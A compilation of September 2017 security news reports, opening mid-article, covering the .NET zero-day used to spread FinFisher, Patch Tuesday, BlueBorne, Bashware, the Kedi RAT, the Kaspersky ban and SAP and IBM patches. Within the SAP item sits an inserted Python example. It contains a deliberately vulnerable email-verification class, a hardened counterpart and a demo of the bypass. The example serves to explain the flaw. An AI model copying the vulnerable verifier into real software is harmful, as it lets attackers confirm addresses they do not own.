On the surface, it appears as if the iPhone X's security systems are fairly robust and well-planned. As soon as the model becomes available in November, we will learn how well these theories will stand against sophisticated hackers who will seek kudos as the first person or group to break into an iPhone X. "While it is difficult to replicate the facial features of a user," comments Stephen Cox, chief security architect at SecureAuth, "early attempts at this technology in consumer devices were easily defeated by simply placing a picture of the user's face in front of the camera. The iPhone X has 3D capabilities that can judge distance, a mitigation for this vulnerability. It remains to be seen how effective it is, but you can bet that the hacker community will fervently try to defeat it."

"We will not know of the quality of Apple’s FaceID facial scanning until the security community tests it, but the combination of an IR sensor and camera makes this system quite accurate and difficult to trick," Corey Nachreiner, CTO at network security firm WatchGuard Technologies, told SecurityWeek.

"Whatever factors you chose," Nachreiner says, "I strongly believe in multifactor authentication. Whether it’s fingerprints or facial scans, bad actors will continually find ways around different identity tokens, even biometric ones. You get strong security by layering multiple tokens (i.e. a password and a facial scan)."

Nachreiner also reminds that your iPhone would have a 3D model of your face. "I’m sure Apple is taking good steps to secure it on the device, but it is technically a valuable new piece of data on your mobile for future attackers to target," he said.

Meanwhile, it is worth noting Edward Snowden's Twitter comment: Good, "Design looks surprisingly robust"; bad, "Normalizes facial scanning, a tech certain to be abused."

As long ago as 2004, the then UK Information Commissioner, Richard Thomas, warned that Britain was in danger of sleepwalking into a surveillance society. Snowden fears that by making facial scanning part of everyday life, the public will accept its use in more and more privacy-invasive applications -- both state and commercial.


September Patch Tuesday, patch your Windows now to avoid ugly surprises
14.9.2017 securityaffairs Vulnerebility

Microsoft has just released the September Patch Tuesday, a huge batch of security updates that addresses 81 vulnerabilities, including the BlueBorne issue.
Microsoft has just released the September Patch Tuesday, a huge batch of security updates that addresses 81 vulnerabilities in almost every supported version of Windows and in other MS products.

The batch includes security updates that address 27 critical and 54 important vulnerabilities, 39 of which could lead to Remote Code Execution (RCE) in Microsoft products.
The September Patch Tuesday addresses vulnerabilities in the following Microsoft products:

Internet Explorer
Microsoft Edge
Microsoft Windows
.NET Framework
Skype for Business and Lync
Microsoft Exchange Server
Microsoft Office, Services, and Web Apps
Adobe Flash Player
Some of the vulnerabilities have already been actively exploited in the wild, such as:

Windows .NET Framework Remote Code Execution (CVE-2017-8759) – It is a zero-day vulnerability that affects the way Microsoft .NET Framework processes untrusted input data.

The flaw could be exploited by an attacker to take full control of the vulnerable system simply by tricking victims into opening a specially crafted document or application sent over an email. The attacker can trigger the issue to create new accounts with full user rights.

According to FireEye, CVE-2017-8759 was actively exploited by an APT group in July to deliver the surveillance malware FinFisher Spyware (FinSpy) to a Russian-speaking “entity” via malicious Microsoft Office RTF files.

It was privately reported by security firm FireEye.


Device Guard Security Feature Bypass Vulnerability (CVE-2017-8746): This vulnerability could be exploited by attackers to inject malicious code into a Windows PowerShell session by bypassing the Device Guard Code Integrity policy.

Microsoft Edge Security Feature Bypass Vulnerability (CVE-2017-8723): This vulnerability affects Edge and is caused by the Content Security Policy (CSP) failing to properly validate certain specially crafted documents. To exploit it, an attacker only needs to trick victims into visiting a compromised website used to deliver malware.

Broadcom BCM43xx Remote Code Execution Vulnerability (CVE-2017-9417): This vulnerability resides in the Broadcom chipset in HoloLens, it could be exploited by attackers to send a specially crafted WiFi packet, enabling them to install programs, view, change, or delete data, even create new accounts with full admin rights.

... and don’t forget the BlueBorne Attack!

The new attack technique, dubbed BlueBorne, was devised by experts at Armis Labs. The researchers discovered a total of eight vulnerabilities in the Bluetooth design that expose devices to cyber attacks. Hackers can exploit the flaws to silently take control of a targeted Bluetooth-enabled device.

Microsoft also fixed four memory corruption and two remote code execution vulnerabilities in MS Office, five information disclosure and one denial of service flaws in Windows Hyper-V, as well as two cross-site scripting (XSS) vulnerabilities in SharePoint.

Don’t waste time, be sure that September security patches are installed as soon as possible.


Kaspersky Lab solutions banned from US government agencies
14.9.2017 securityaffairs BigBrothers

The US Department of Homeland Security has banned government agencies from using software products developed by Kaspersky Lab.
Bad news for security firm Kaspersky: the US Department of Homeland Security has banned government agencies from using software products developed by Kaspersky Lab. The ban is a response to concerns about possible ties between Kaspersky and Russian intelligence agencies.

According to The Washington Post, which first reported the news, the order applies to all civilian government networks, but not the military ones.

In July, the US General Services Administration announced that the security firm Kaspersky Lab was deleted from lists of approved vendors.

The US government banned Kaspersky solutions amid concerns over Russian state-sponsored hacking.

Now, Homeland Security has issued a Binding Operational Directive that orders agencies to remove products developed by Kaspersky Lab within 90 days.

IT managers have 30 days to assess their infrastructure to check for the presence of Kaspersky software and 60 days to develop a plan to remove it.

“The Department is concerned about the ties between certain Kaspersky officials and Russian intelligence and other government agencies, and requirements under Russian law that allow Russian intelligence agencies to request or compel assistance from Kaspersky and to intercept communications transiting Russian networks,” the agency said in a statement.

“The risk that the Russian government, whether acting on its own or in collaboration with Kaspersky, could capitalize on access provided by Kaspersky products to compromise federal information and information systems directly implicates U.S. national security.”


A Kaspersky Lab spokesperson said in a statement that the company is disappointed in the DHS decision.

“No credible evidence has been presented publicly by anyone or any organization, as the accusations are based on false allegations and inaccurate assumptions, including claims about the impact of Russian regulations and policies on the company. Kaspersky Lab has never helped, nor will help, any government in the world with its cyberespionage or offensive cyber efforts, and it’s disconcerting that a private company can be considered guilty until proven innocent, due to geopolitical issues,” a spokesperson from Kaspersky told The Register.

The company says it will provide all the information needed to demonstrate that “these allegations are completely unfounded.”

“Kaspersky Lab has always acknowledged that it provides appropriate products and services to governments around the world to protect those organizations from cyberthreats, but it does not have unethical ties or affiliations with any government, including Russia,” a Kaspersky spokesman said.


The company rejected any allegation and also clarified that Russian policies and laws are applied to telecoms and ISPs, not security firms like Kaspersky.

Senator Jeanne Shaheen (D-N.H.), who had previously asked the US Government to take action against Kaspersky Lab, praised the decision.

Sen. Jeanne Shaheen (@SenatorShaheen) tweeted on Sep 13, 2017:
Applaud DHS for heeding my call to remove all Kaspersky products from fed agencies. Kaspersky is a direct threat to national security
Recently the tech retailer Best Buy pulled Kaspersky products from its shelves and website.


Immediately Patch Windows 0-Day Flaw That's Being Used to Spread Spyware
14.9.2017 thehackernews  Vulnerebility
Get ready to install a fairly large batch of security patches onto your Windows computers.
As part of its September Patch Tuesday, Microsoft has released a large batch of security updates to patch a total of 81 CVE-listed vulnerabilities, on all supported versions of Windows and other MS products.
The latest security update addresses 27 critical and 54 important vulnerabilities; 38 of them affect Windows, and 39 could lead to Remote Code Execution (RCE).
Affected Microsoft products include:
Internet Explorer
Microsoft Edge
Microsoft Windows
.NET Framework
Skype for Business and Lync
Microsoft Exchange Server
Microsoft Office, Services and Web Apps
Adobe Flash Player
.NET 0-Day Flaw Under Active Attack
According to the company, four of the patched vulnerabilities are publicly known, one of which has already been actively exploited by the attackers in the wild.
Here's the list of publicly known flaws and their impact:
Windows .NET Framework RCE (CVE-2017-8759)—A zero-day flaw, discovered by researchers at cybersecurity firm FireEye and privately reported to Microsoft, that resides in the way Microsoft .NET Framework processes untrusted input data.
Microsoft says the flaw could allow an attacker to take control of an affected system, install programs, view, change, or delete data by tricking victims into opening a specially crafted document or application sent over an email.
The flaw could even allow an attacker to create new accounts with full user rights. Therefore users with fewer user rights on the system are less impacted than users who operate with admin rights.
According to FireEye, this zero-day flaw has actively been exploited by a well-funded cyber espionage group to deliver FinFisher Spyware (FinSpy) to a Russian-speaking "entity" via malicious Microsoft Office RTF files in July this year.
FinSpy is a highly secret surveillance software that has previously been associated with British company Gamma Group, a company that legally sells surveillance and espionage software to government agencies.
Once installed, FinSpy can perform a large number of covert tasks on the victim's computer, including secretly monitoring the machine by turning on the webcam, recording everything the user types with a keylogger, intercepting Skype calls, copying files, and much more.
"The [new variant of FINSPY]...leverages heavily obfuscated code that employs a built-in virtual machine – among other anti-analysis techniques – to make reversing more difficult," researchers at FireEye said.
"As likely another unique anti-analysis technique, it parses its own full path and searches for the string representation of its own MD5 hash. Many resources, such as analysis tools and sandboxes, rename files/samples to their MD5 hash in order to ensure unique filenames."
Three Publicly Disclosed Vulnerabilities
The remaining three publicly known vulnerabilities affecting the Windows 10 platform include:
Device Guard Security Feature Bypass Vulnerability (CVE-2017-8746): This flaw could allow an attacker to inject malicious code into a Windows PowerShell session by bypassing the Device Guard Code Integrity policy.
Microsoft Edge Security Feature Bypass Vulnerability (CVE-2017-8723): This flaw resides in Edge where the Content Security Policy (CSP) fails to properly validate certain specially crafted documents, allowing attackers to trick users into visiting a website hosting malware.
Broadcom BCM43xx Remote Code Execution Vulnerability (CVE-2017-9417): this flaw exists in the Broadcom chipset in HoloLens, which could be exploited by attackers to send a specially crafted WiFi packet, enabling them to install programs, view, change, or delete data, even create new accounts with full admin rights.
BlueBorne Attack: Another Reason to Install Patches Immediately
Also, the recently disclosed Bluetooth vulnerabilities known as "BlueBorne" (which affect more than 5 Million Bluetooth-enabled devices, including Windows ones) were silently patched by Microsoft in July, but details of the flaws have only been released now.
BlueBorne is a series of flaws in Bluetooth implementations that could allow attackers to take over Bluetooth-enabled devices, spread malware, or even establish a "man-in-the-middle" connection to gain access to devices' critical data and networks, all without requiring any victim interaction.
So, users have another important reason to apply September security patches as soon as possible in order to keep hackers and cyber criminals away from taking control over their computers.
Other flaws patched this month include five information disclosure and one denial of service flaws in Windows Hyper-V, two cross-site scripting (XSS) flaws in SharePoint, as well as four memory corruption and two remote code execution vulnerabilities in MS Office.
For installing security updates, simply head on to Settings → Update & security → Windows Update → Check for updates, or you can install the updates manually.


Bluetooth has holes. The new BlueBorne attack takes over a computer or phone in 10 seconds
13.9.2017 Root.cz Cyber attack
How do you completely take over a device with Bluetooth available and infect it with malware, or get into a man-in-the-middle position? Easily. Security researchers at Armis have devised an attack that could take over more than five billion devices. The Hacker News reported on it.

According to the security analysis, it threatens devices running Android, iOS, Windows and Linux, all the way to IoT devices, as long as those devices use Bluetooth.

Patches have already been released for some platforms, but users of older versions of Android and iOS are still at risk. Android users can download the "BlueBorne Vulnerability Scanner" app, created by Armis and available through the Google Play Store. The app lets you find out whether a given device is vulnerable to BlueBorne.


Microsoft has released its regular batch of fixes. It still hasn't resolved apps switched to English

13.9.2017 cnews.cz Vulnerabilities
Either way, fire up Windows Update.

Yesterday evening Microsoft served up its regular dose of fixes. It was the so-called Patch Tuesday, and a number of products, above all Windows and Office, received their bug fixes and patches for security weaknesses.

The fix packages head to Windows 10, 8.1 and 7 in the form of cumulative updates:

update KB4038788 for Windows 10 v1703 raises the build number to 15063.608,
update KB4038782 for Windows 10 v1607 raises the build number to 14393.1715,
update KB4038783 for Windows 10 v1511 raises the build number to 10586.1106,
update KB4038781 for Windows 10 v1507 raises the build number to 10240.17609,
update KB4038792 for Windows 8.1 brings all fixes,
update KB4038793 for Windows 8.1 brings security patches only,
update KB4038777 for Windows 7 brings all fixes,
update KB4038779 for Windows 7 brings security patches only.
Fixes for Creators Update

The update for Creators Update brings changes and fixes for the following problems:

The color profile might not be restored to the user's original settings after playing a game in full-screen mode.
The updated HDR feature is now disabled by default.
After adding a third-party IME, the Start menu sometimes didn't open.
Issues with some scanners were resolved.
Mobile Device Manager Enterprise could cause a mobile device to stop working correctly.
Some machines might not find wireless devices after waking from sleep.
Windows Error Reporting didn't clean up its temporary files when folder redirection was in use.
Revoking a certificate associated with an inactive user account might fail.
There were significant memory leaks in LSASS.
Enabling encryption with syskey.exe could break system startup.
The BitLocker.psm1 PowerShell script no longer logs passwords when you enable logging.
Adding credentials with an empty password to Credential Manager could cause the system to crash when those credentials were used.
The address bar in Internet Explorer 11 was updated.
In Internet Explorer, undo stopped working if a character conversion was cancelled via an IME.
After enabling EMIE, there was constant switching between Edge and Internet Explorer.
A device could freeze for several minutes if a USB network adapter was connected to it.
Some applications couldn't start because the IPHlpSvc service stopped responding during Windows startup.
The spoolsv.exe service sometimes stopped working.
The Get-AuthenticodeSignature script didn't show the TimeStamperCertificate.
After upgrading to Windows 10, long delays could be observed when using applications hosted on Windows Server 2008 SP2 machines.
There were display issues with RemoteApp applications if you minimized an application and restored it to full-screen mode.
File Explorer could stop responding, which could further lead to the whole system freezing.
The Export-StartLayout script failed when exporting the tile layout at system startup.
The option to join Azure AD was sometimes unavailable during initial device setup.
Sometimes tapping a notification didn't trigger the action it should have initiated.
The MS16-087 security fix related to printing was re-released.
Security weaknesses across the system were fixed.
Edge still speaks English

Incidentally, Microsoft lists one known issue for the update. Installing update KB4034674 could switch Edge and some other applications to English. The switch could only happen on two language versions of Windows. If you use Creators Update, you know that one of them is Czech and that the problem has persisted for months now. (The other is Arabic.)

Surprisingly, Microsoft still hasn't offered a fix, so the previously changed language setting remains changed, i.e. in Edge and company you see labels in English. Personally I have no problem with English, but the inability to return things to their original state is baffling. Bugs can and will happen; what matters is the approach to fixing them. In this case Microsoft isn't doing itself any favors. Let's hope it soon manages to repair what it broke.


Thanks to a new Windows 10 feature, undetectable malware has emerged. Antivirus software can't handle it
13.9.2017 Živě.cz Viruses
A team of computer experts from security company Check Point has created a new kind of malicious code for Windows 10 that no antivirus software can catch. The infiltration technique relies on the Unix shell that is an optional component of Windows 10. The threat was reported by iTWire.

Recall that last year Microsoft surprised everyone with its decision to integrate the full-featured Bash command shell interpreter into Windows 10. Subsequently, on 3 August 2016, the comprehensive update package known as the Anniversary Update was released, and the Unix command line thus became part of Windows 10.

The Windows Subsystem for Linux (WSL) feature, which is responsible for running the Unix shell, uses a set of special drivers and services. For maximum compatibility, so-called Pico processes were also introduced, which allow ELF files to be run in the Windows environment.

In practice, all inputs initiated through WSL are transformed into equivalent calls that can be executed in the Windows kernel. The requests are then handled as if they had been initiated by an ordinary application written for Windows. However, this is not really virtualization, but native translation of system calls.

In their report, the researchers warned that the WSL feature could be abused to perfectly disguise malicious activity. During testing they created a sample of malicious code with which they repeatedly infected computers running top-tier security products. The result was that they managed to bypass every one of them and successfully launch the infiltration.

It was named Bashware

The experts point out that so-called Bashware does not exploit any logic or programming errors in WSL. According to them, the attack is possible because of insufficient interest on the part of security product vendors.

The problem is said to be mainly the mistaken belief that the WSL feature must be enabled manually via developer mode. As a result, there is currently no significant effort to cover it with antivirus protection.

The WSL feature is indeed optional and is not active by default. According to the researchers, however, a simple script is enough to modify a few keys in the Windows registry, and the whole process runs inconspicuously in the background. All a potential victim has to do is run a planted file. The computer can then be infected with malware or a new kind of ransomware.
The first part of the video shows the real functionality of an unspecified antivirus product. In the second part, malware abusing WSL is launched. The complex malicious code gradually activates WSL and developer mode, installs the Wine layer and finally launches the infiltration itself. The final part shows the ransomware being launched and running.
Check Point declined to specify which security products failed. The aim of the research was reportedly to get antivirus makers interested in covering the WSL feature.


New Kedi RAT Uses Gmail to Exfiltrate Data

13.9.2017 securityweek  Virus
Kedi RAT Pretends to be a Citrix Utility, Transfers Data Using Gmail

A newly discovered remote access Trojan (RAT) capable of evading security scanners communicates with its command and control (C&C) server via Gmail, Sophos has discovered.

Dubbed Kedi, the RAT was designed to steal data and is being spread via spear-phishing emails, the security researchers say. The observed attacks appear targeted with the malicious payload masquerading as a Citrix utility.

The RAT’s capabilities aren’t out of the ordinary: AntiVM/anti-sandbox features, the ability to extract and run embedded secondary payloads, file download/upload backdoors, screenshot grabbing, keylogging, and the ability to extract usernames, computer names, and domains. According to Sophos, most of these features are command-driven.

What makes the Trojan stand out from the crowd, however, is its ability to communicate with its C&C using Gmail (the Basic HTML version). Nonetheless, the malware can also talk to the server using DNS and HTTPS requests, the security researchers have discovered.

“Using Gmail to receive instructions from its C&C, Kedi navigates to the inbox, finds the last unread message, grabs content from message body and parses commands from this content. To send information back to command and control, base64 encodes the message data, replies to the received message, adds encoded message data and sends its message,” Sophos reveals.

The spear-phishing attack distributing the threat was observed last week. While Kedi doesn’t appear to have been involved in a widespread campaign to date, it could end up targeting more users soon, Sophos warns.

To stay protected, users should pay close attention when clicking on links or opening files they receive via email from unknown sources. Users are also advised to keep operating systems and applications up to date at all time, as well as to use and maintain an anti-virus application.


Microsoft Patches Zero-Day, Many Other Flaws

13.9.2017 securityweek  Vulnerebility
Microsoft’s Patch Tuesday updates for September 2017 address roughly 80 vulnerabilities, including a zero-day exploited by threat actors to deliver spyware and several flaws that have been publicly disclosed.

The vulnerability exploited in attacks, reported to Microsoft by researchers at FireEye, is tracked as CVE-2017-8759 and it affects the .NET framework. The attacks have been linked by Microsoft to a threat group identified as NEODYMIUM.

In the attacks observed by FireEye, hackers exploited CVE-2017-8759 via specially crafted documents to deliver FinFisher (FinSpy/WingBird) malware to Russian-speaking users. Despite being actively exploited, Microsoft has assigned an “important” severity rating to this vulnerability.

Microsoft’s latest security updates also fix three issues that were publicly disclosed before the patches were made available. This includes a moderate severity security feature bypass bug in Edge (CVE-2017-8723) that the company believes is unlikely to be exploited.

Another publicly disclosed security bypass flaw affects the Device Guard feature and it allows an attacker to inject malicious code into a Windows PowerShell session. A vulnerability in Broadcom chipsets that exposes Hololens to remote code execution has also been disclosed.

“The three public disclosures this month are all on the Windows 10 platform. Two in the OS and one in the Edge browser. While all three of these have lower exploitability index ratings, the fact that they have been Publicly Disclosed means a threat actor has enough information to potentially create an exploit,” said Chris Goettl, product manager at Ivanti. “Public Disclosures are a threat indicator to watch for as they are at higher risk of being exploited since some of the busy work of research and finding how to exploit may have been done for them already.”

Microsoft has patched tens of critical vulnerabilities in Internet Explorer, Edge, Windows, and NetBIOS. Important flaws have been addressed in web browsers, Hyper-V, Exchange, Windows, Office, and SharePoint.

The company has also released an advisory for a patch that addresses a Bluetooth driver spoofing vulnerability disclosed by IoT security firm Armis on Tuesday. The flaw, which makes BlueBorne attacks possible, was patched by the company in July, but disclosure was withheld until other vendors could develop and release fixes.

Adobe also released security updates on Tuesday. The company patched only two vulnerabilities in Flash Player this month, but both have been classified as critical and they both allow remote code execution.


U.S. Energy Department Invests $20 Million in Cybersecurity

13.9.2017 securityweek  Cyber
The United States Department of Energy announced on Tuesday its intention to invest up to $50 million in the research and development of tools and technologies that would make the country’s energy infrastructure more resilient and secure. Over $20 million of that amount has been allocated to projects focusing on cyber security.

The funding, awarded to various national laboratories, will be used to support early-stage research and development of next-generation tools and technologies that improve the resilience and security of critical energy infrastructure, including the power grid, and oil and natural gas infrastructure.

Nine national laboratories in California, Illinois, Idaho, Tennessee, Washington, Colorado and New Mexico have been selected for a total of 20 projects focusing on protecting energy infrastructure from cyber threats and improving information sharing.

Specifically, the Energy Department wants tools and technologies that enhance cybersecurity, communication systems for resilient grid architectures, energy delivery systems that can adapt to survive a cyber incident and ones that are verifiably trustworthy, partnerships for reducing risks via vulnerability mitigation, and identifying energy delivery systems that are inadvertently accessible from the Internet.

For example, the Idaho National Laboratory has been tasked with developing a technique that will help secure firmware on the embedded systems used by field devices, and the Los Alamos National Laboratory will work on designing a quantum secure communication operational network.

The Pacific Northwest National Laboratory has been assigned six projects, including one for developing blockchain cybersecurity technology for distributed energy resources at the edge of the grid.

“These technologies are expected to have broad applicability to the U.S. energy delivery sector by meeting the needs of the energy sector in a cost-effective manner with a clear path for acceptance by asset owners and operators,” said the Energy Department.

While the energy sector in the United States has not suffered damaging attacks such as the ones that hit Iran, Saudi Arabia and Ukraine, organizations in this sector and the Energy Department itself have fallen victim to cyberattacks.

The most recent report on such attacks is from security firm Symantec and it describes the activities of Russia-linked cyberspies that may have gained access to control systems housed by energy facilities.


SAP Resolves 16 Vulnerabilities with September 2017 Patches

13.9.2017 securityweek  Vulnerebility
SAP on Tuesday released 16 security notes as part of its SAP Security Patch Day, to which it also added 1 out-of-band release and 6 updates to previously released Security Notes, for a total of 23 Notes.

Three of this month’s Security Notes were rated High severity, 17 were rated Medium risk, and three were assessed with Low impact. The highest CVSS score of the vulnerabilities is 8.1, the German software corporation explains in an advisory.

Impacted products include SAP Point of Sale (POS), SAP NetWeaver, E-Recruiting, Adobe Document Services, Web Dynpro ABAP, SAPGUI for HTML, Web Dynpro Java, BIWorkspace, SAP Note Assistant, TREX / BWA, SAP BI mobile application, and SAP ASE Installer, among others.

SAP’s September 2017 patch update also includes 10 Support Package Notes in addition to said 23 SAP Security Patch Day Notes, with 9 of all the patches being updates to previously released Security Notes, ERPScan, a company that specializes in securing SAP and Oracle applications, reveals.

The company also points out that Cross-Site Scripting represented the most common type of addressed vulnerabilities (8 out of 33). Other bug types included: Missing Authorization Check (7), implementation flaws (5), and information disclosure (4). SAP also addressed open redirect, SQL injection, cross-site request forgery, XML external entity, denial of service, hardcoded credentials, and authentication bypass vulnerabilities.

The most important of this month’s patches address vulnerabilities in SAP Point of Sale (POS) Retail Xpress Server. A missing authentication check was initially addressed in July, but the implemented check could be bypassed, so SAP released an out-of-band patch on August 18. The company included the update and new patch in the new Security Patch Day Notes.

One of the addressed bugs was an email verification bypass in SAP E-Recruiting, disclosed by SEC Consult Vulnerability Lab. The researchers discovered that the confirmation link received during the application registration contains parameters representing an incremental user ID and a random value that is not bound to the current registration. Thus, an attacker could guess the user ID and use a known value to register email addresses they didn’t have access to.
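The bug class above, modelled as an added example (not SAP's or SEC Consult's code): a toy registration service whose confirmation link carries an incremental user ID plus a random value that is not bound to that registration, beside a hardened design that binds the token to the specific user, address and a per-registration nonce. The in-memory store, the parameter names and the example addresses are constructed for illustration.

```python
"""Added example: e-mail verification token bound vs. unbound to a registration.

Nothing here is SAP E-Recruiting code; the store, names and addresses are
constructed for illustration.
"""
import hashlib
import hmac
import secrets
import time
from dataclasses import dataclass, field


@dataclass
class Registration:
    user_id: int
    email: str
    confirmed: bool = False
    nonce: str = ""  # per-registration secret, used by the hardened design only
    created: float = field(default_factory=time.time)


class VulnerableVerifier:
    """Mirrors the flaw: the server only checks that the random value is one it
    ever issued, not that it belongs to user_id. Any valid value plus a guessed
    (sequential) user_id therefore confirms someone else's registration."""

    def __init__(self):
        self.registrations = {}
        self.next_id = 1000
        self.issued_values = set()

    def register(self, email):
        reg = Registration(self.next_id, email)
        self.registrations[reg.user_id] = reg
        self.next_id += 1
        value = secrets.token_hex(8)
        self.issued_values.add(value)  # not tied to reg.user_id
        return reg.user_id, value

    def confirm(self, user_id, value):
        reg = self.registrations.get(user_id)
        if reg is None or value not in self.issued_values:
            return False
        reg.confirmed = True
        return True


class HardenedVerifier:
    """Token = HMAC-SHA256(secret, user_id | email | nonce), so it is valid for
    exactly one registration; compared in constant time, time-limited, single-use."""

    TTL = 24 * 3600  # seconds a confirmation link stays valid

    def __init__(self, secret):
        self.secret = secret
        self.registrations = {}
        self.next_id = 1000

    def _token(self, reg):
        msg = f"{reg.user_id}|{reg.email}|{reg.nonce}".encode()
        return hmac.new(self.secret, msg, hashlib.sha256).hexdigest()

    def register(self, email):
        reg = Registration(self.next_id, email, nonce=secrets.token_hex(16))
        self.registrations[reg.user_id] = reg
        self.next_id += 1
        return reg.user_id, self._token(reg)

    def confirm(self, user_id, token, now=None):
        reg = self.registrations.get(user_id)
        if reg is None or reg.confirmed:
            return False
        if (now if now is not None else time.time()) - reg.created > self.TTL:
            return False
        if not hmac.compare_digest(self._token(reg), token):
            return False
        reg.confirmed = True
        reg.nonce = ""  # single use: a captured link cannot be replayed
        return True


def demo():
    """A second registrant replays their own value against the neighbouring
    user_id of the first registration; returns the four outcomes."""
    v = VulnerableVerifier()
    first_id, _ = v.register("first@example.com")
    _, second_value = v.register("second@example.com")
    vuln_bypassed = v.confirm(first_id, second_value)  # True: value not bound

    h = HardenedVerifier(secret=secrets.token_bytes(32))
    first_id, first_token = h.register("first@example.com")
    _, second_token = h.register("second@example.com")
    hard_bypassed = h.confirm(first_id, second_token)  # False: wrong HMAC
    legit = h.confirm(first_id, first_token)  # True: bound token
    replay = h.confirm(first_id, first_token)  # False: already used
    return vuln_bypassed, hard_bypassed, legit, replay


if __name__ == "__main__":
    print(demo())
```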

Two of the notes released this month each affect a single country. They address a Cross-Site Request Forgery (CSRF) vulnerability in Electronic Ledger Management for Turkey 1.0 and a Missing Authority Check in a function for Brazilian invoicing features (Electronic Nota Fiscal, NF-e), Onapsis, another company focused on securing SAP and Oracle software, points out.

SAP also announced plans to deliver all SAP Notes files with digital signature to improve security. Because the SAP Notes files can get maliciously modified before being delivered to customers, the new feature will ensure increased authenticity and improved security.

“The digitally signed SAP Notes will be available as SAR files. To ensure authenticity of the delivered SAP Notes files, Note Assistant tool (transaction SNOTE) needs to be enabled to upload digitally signed SAP Notes having ABAP corrections,” SAP says.

Customers interested in enabling Note Assistant to upload digitally signed SAP Notes need to implement SAP Security Note 2408073. The note enables digital signature verification feature only for uploading digitally signed SAP Notes. The feature to download the digitally signed notes will be implemented in the coming months.

“SAP Security Response Team hereby also announces that SAP plans to become a CVE Numbering Authority by the end of 2017. Using CVE as a mechanism to disclose patches to vulnerabilities reported by external sources, SAP will facilitate faster patch consumption and transparency for all SAP Customers,” the company also revealed.


Serious Flaws Found in IBM InfoSphere Products

13.9.2017 securityweek  Vulnerebility
IT security services company SEC Consult on Wednesday disclosed the details of several unpatched vulnerabilities affecting IBM’s InfoSphere DataStage and Information Server data integration tools.

The flaws were reported to the vendor on May 23, but patches still haven’t been released. However, IBM has published advisories for each of the issues, providing recommendations on how to mitigate potential attacks.

SEC Consult discovered the vulnerabilities, which it has collectively classified as critical, in InfoSphere DataStage 11.5, but IBM determined that they also impact InfoSphere Information Server and DataStage versions 9.1, 11.3 and 11.5.

The most serious of the flaws, based on the 8.4 CVSS score assigned by IBM, is CVE-2017-1468. The security hole exists because the Director and Designer clients don’t check file signatures before loading and running executable files, allowing a local attacker to place arbitrary executable files in installation directories and escalate privileges.

Another high severity vulnerability is CVE-2017-1467, a weak authorization issue that allows attackers to execute arbitrary system commands.

“An unauthorized user could intercept communication between client and server, and replay certain DataStage commands without privileged access,” IBM said in its advisory.

An XML External Entity (XXE) injection vulnerability that can be exploited by a remote attacker to obtain arbitrary files from the client system (CVE-2017-1383) has also been classified as high severity.

Researchers also discovered that privileged users can trigger a memory dump that could contain highly sensitive information in clear text, including credentials. IBM was also informed that the application loads DLL files from its home directory without verifying them, which could lead to arbitrary code execution.

While patches have not been released for these security holes, IBM has provided mitigation advice for most of the issues; mitigations for the DLL hijacking flaw will be made available by November 30.

The tech giant told SEC Consult that the vulnerabilities will be addressed in a new client interface the company is working on.

“SEC Consult recommends the vendor to conduct a comprehensive security analysis, based on security source code reviews, in order to identify all vulnerabilities in the Remote Management platform and increase the security for its customers,” SEC Consult said in its advisory.


Bashware attack, how to run Linux malware on Windows systems
13.9.2017 securityaffairs Attack

Experts have found a new, alarming method, dubbed the Bashware attack, that allows attackers to silently run malware and bypass even the most common security solutions.
The new Windows 10 feature Windows Subsystem for Linux (WSL), which brings the Linux bash shell to Microsoft's operating system, could be exploited by malware to run undetected.

The feature was recently included in beta versions and it will be available for all users in the upcoming Windows 10 Fall Creators Update (FCU), set to be released by Microsoft in October 2017.

According to researchers with security firm Check Point, malware designed for Linux can run undetected on Windows systems.


The new attack technique, dubbed Bashware, allows malicious code to evade detection by antivirus solutions written for Windows; for this reason, it could also be used by existing Linux malware.

“Existing security solutions are still not adapted to monitor processes of Linux executables running on Windows OS, a hybrid concept which allows a combination of Linux and Windows systems to run at the same time.” reads the analysis published by Check Point. “This may open a door for cyber criminals wishing to run their malicious code undetected, and allow them to use the features provided by WSL to hide from security products that have not yet integrated the proper detection mechanisms.”

Check Point also published a video PoC of the Bashware attack.

Security researchers have demonstrated that the Bashware attack goes undetected by most security solutions; it could potentially affect more than 400 million systems already running Windows 10.

“Bashware is so alarming because it shows how easy it is to take advantage of the WSL mechanism to allow any malware to bypass security products. We tested this technique on most of the leading anti-virus and security products on the market, successfully bypassing them all. This means that Bashware may potentially affect any of the 400 million computers currently running Windows 10 PC globally.” continues the analysis.

According to the experts, the risk is nonetheless limited because the WSL feature is disabled by default and must be explicitly enabled by the Windows user.

Check Point also added that the WSL could be silently enabled in the background, allowing the malware to run.

Microsoft downplayed the risks to end-users because the feature is disabled by default.


Canadian Class Action Suit Launched Against Equifax Over Data Breach

13.9.2017 securityweek CyberCrime
A class action lawsuit by Canadian consumers whose data was stolen in a massive hack of US credit bureau Equifax was launched Tuesday, seeking damages of Can $550 billion ($450 billion US).

The proposed class action includes all residents of Canada whose information was stored on Equifax databases and was accessed without authorization between May 1, 2017 and August 1, 2017, according to a statement by the Toronto-based Sotos law firm.

The hack was disclosed last week by Equifax, one of the three major credit bureaus that collect consumer financial data, and potentially affects 143 million US customers, as well as an as yet unspecified number of Canadian and British customers.

The breach is considered one of the worst-ever because of the nature of data collected: bank and social security numbers and personal information of value to hackers and others.

"Equifax set up a dedicated website to provide information to US customers who may have been affected, but there is no way for Canadians to identify if they were affected," said lawyer Jean-Marc Leclerc.

"Fighting identity theft takes years, during which a consumer's ability to obtain anything with credit is compromised: purchasing a house, renting an apartment or obtaining a credit card or line of credit, for example."

The claim alleges that Equifax breached its contract with class members as well as their privacy rights and was negligent in handling their information.

Some reports have suggested Equifax data was being sold on "dark web" marketplaces, but analysts said it was too soon to know who was behind the attack and the motivation.


.NET Zero-Day Flaw Exploited to Deliver FinFisher Spyware

13.9.2017 securityweek Vulnerability
One of the vulnerabilities patched by Microsoft with this month’s security updates is a zero-day flaw exploited by threat actors to deliver FinFisher malware to Russian-speaking individuals.

The vulnerability, reported to Microsoft by researchers at FireEye, is tracked as CVE-2017-8759 and it affects the .NET framework, specifically a SOAP WSDL (Web Services Description Language) parser. An attacker can exploit the security hole for remote code execution by getting the targeted user to open a specially crafted document or application.

In the attacks observed by FireEye, a threat actor exploited the vulnerability via malicious documents that download several components before deploying the final payload – a variant of FinFisher.

FinFisher, also known as FINSPY and WingBird, is a lawful interception tool that its developer claims is sold only to governments. However, researchers have discovered on numerous occasions that the spyware has been used by countries with a poor reputation when it comes to human rights and civil liberties.

In the recent attacks seen by FireEye, a threat actor delivered the spyware via a document named “Проект.doc” (“project” in Russian). The security firm stated, with moderate confidence, that a state-sponsored group launched the attack in an effort to spy on Russian-speaking users.

